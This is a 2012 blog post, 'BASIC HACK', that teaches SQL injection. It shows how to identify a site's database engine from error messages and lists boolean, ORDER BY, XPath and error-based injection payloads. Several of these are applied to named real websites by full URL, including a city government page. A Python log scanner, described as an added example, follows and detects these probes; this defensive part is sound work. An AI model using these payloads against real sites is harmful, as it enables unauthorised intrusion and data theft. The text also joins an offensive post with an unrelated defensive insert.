BASIC HACK

Sunday 9 September 2012

How to identify the database (SQL DB) and the method of injection

MySQL server

Identified from the error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax

Append the query after the link:

/*!50067 AND 47=47 */

The page returns true (loads normally):

https://www.manase.org/maharashtra.php?mid=86/*!50067%20AND%2047=47%20*/
http://www.peterduff.com/main.php?ID=1/*!50067%20AND%2047=47%20*/

MS-Access

Identified from the error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=66''.

/product.asp, line 106 

Oracle

Identified from the error message:

Warning: oci_parse() [function.oci-parse]: ORA-01756: une chaîne entre apostrophes ne se termine pas correctement in D:\wamp\www_mediaction\site\cfpb_reseau_france.php on line 14

Append the query after the link:

String Concatenation

+SELECT ‘A’ || ‘B’ FROM dual; — returns AB

The page returns true (loads normally):

http://www.cfpb.fr/cfpb_reseau_france.php?id=1+SELECT%20%E2%80%98A%E2%80%99%20||%20%E2%80%98B%E2%80%99%20FROM%20dual;%20%E2%80%94%20returns%20AB

You can also use:

+MINUS SELECT NULL, NULL, NULL FROM DUAL

The page returns true (loads normally):

http://www.cfpb.fr/cfpb_reseau_france.php?id=1+MINUS%20SELECT%20NULL,%20NULL,%20NULL%20FROM%20DUAL

PostgreSQL

Identified from the error message:

Warning: pg_query(): Query failed: ERROR: unterminated quoted string at or near

String Concatenation

+AND 'str1str2'='str1'||'str2'

The page returns true (loads normally):

http://www.pittsburghpa.gov/mayor/article.htm?id=851+AND%20%27str1str2%27=%27str1%27||%27str2%27

Sybase

Identified from the error message:

Warning: sybase_query() [function.sybase-query]: Sybase: Server message: Unclosed quote before the character string ' '. (severity 15, procedure N/A) in /www/okfarmbureau/LFWSmartyPage.php on line 60

Firebirdsql

Identified from the error message:

Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 as approximate floating-point values in SQL dialect 1, but as 64-bit in \\deceasrv16\hca$\noticias\exibir_noticias.php on line 15

To identify the method of injection | syntax used

++

If ORDER BY is not working, use string-based injection:

id=-1' order by 100 -- -

-- - ,, --++- ,, -++--,,

++

Blind-sql

+And+1=1 | True
+And+1=2 | Error
+And+(select+1)=1 | True

++

PostgreSQL

+AND+1::int=1 | True
+AND+1::int=2 | Error

++

Oracle

+UNION+SELECT+NULL+from+dual | True
+MINUS SELECT NULL, NULL, NULL FROM DUAL | True

++

xpath injection

+and extractvalue(rand(),concat(0x0a,version()))--

+and+extractvalue(rand(),concat(0x7e,version()))--

+and+updatexml(0x7e,concat(0x7e,(version())),0)--
++

Error Based

+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--
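
Seen from the defender's side, every probe listed above leaves a recognisable trace in the web server's access log. The following Python scanner is an added example, not code from the original post: it URL-decodes each request and tags the probe families from this page. The signature names, regexes, the combined log format and the sample log lines are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Probe families taken from the syntax in this post; names and regexes are this example's own.
SIGNATURES = [
    ("mysql-versioned-comment", re.compile(r"/\*!\d{5}")),
    ("xpath-error", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("group-by-rand-error", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("oracle-dual", re.compile(r"\b(union|minus)\s+select\b.*\bfrom\s+dual\b", re.I)),
    ("postgres-cast", re.compile(r"\b\d+::int\s*=\s*\d+", re.I)),
    ("string-concat-test", re.compile(r"'[^']*'\s*=\s*'[^']*'\s*\|\|\s*'[^']*'")),
    ("boolean-test", re.compile(r"\b(and|or)\s+(\(\s*select\s+\d+\s*\)|\d+)\s*=\s*\d+", re.I)),
    ("order-by-count", re.compile(r"\border\s+by\s+\d+", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # combined log format assumed
# Constructed sample lines: documentation IPs, placeholder path /item.php.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Sep/2012:10:00:01 +0000] "GET /item.php?id=86/*!50067%20AND%2047=47%20*/ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Sep/2012:10:00:04 +0000] "GET /item.php?id=1+AND+1::int=2 HTTP/1.1" 500 312',
    '203.0.113.7 - - [09/Sep/2012:10:00:09 +0000] "GET /item.php?id=1+and+extractvalue(rand(),concat(0x7e,version()))-- HTTP/1.1" 200 901',
    '198.51.100.20 - - [09/Sep/2012:10:01:00 +0000] "GET /item.php?id=86&sort=name HTTP/1.1" 200 5120',
]

def decode(target, rounds=2):
    """URL-decode `rounds` times so double-encoded probes are still seen."""
    for _ in range(rounds):
        target = unquote_plus(target)
    return target

def classify(log_line):
    """Return the sorted probe families found in the query string of one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    text = decode(m.group(1).partition("?")[2])
    return sorted(name for name, rx in SIGNATURES if rx.search(text))

def scan(lines):
    """Map client IP -> probe families; several DBMS-specific families from one IP suggests fingerprinting."""
    seen = {}
    for line in lines:
        hits = classify(line)
        if hits:
            seen.setdefault(line.split()[0], set()).update(hits)
    return seen

if __name__ == "__main__":
    for ip, families in scan(SAMPLE_LOG).items():
        print(ip, sorted(families))
```

A client that triggers MySQL-, PostgreSQL- and Oracle-specific families within a short window is working through a fingerprinting sequence like the one in this post, which is a stronger signal than any single match.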


thank you for reading...
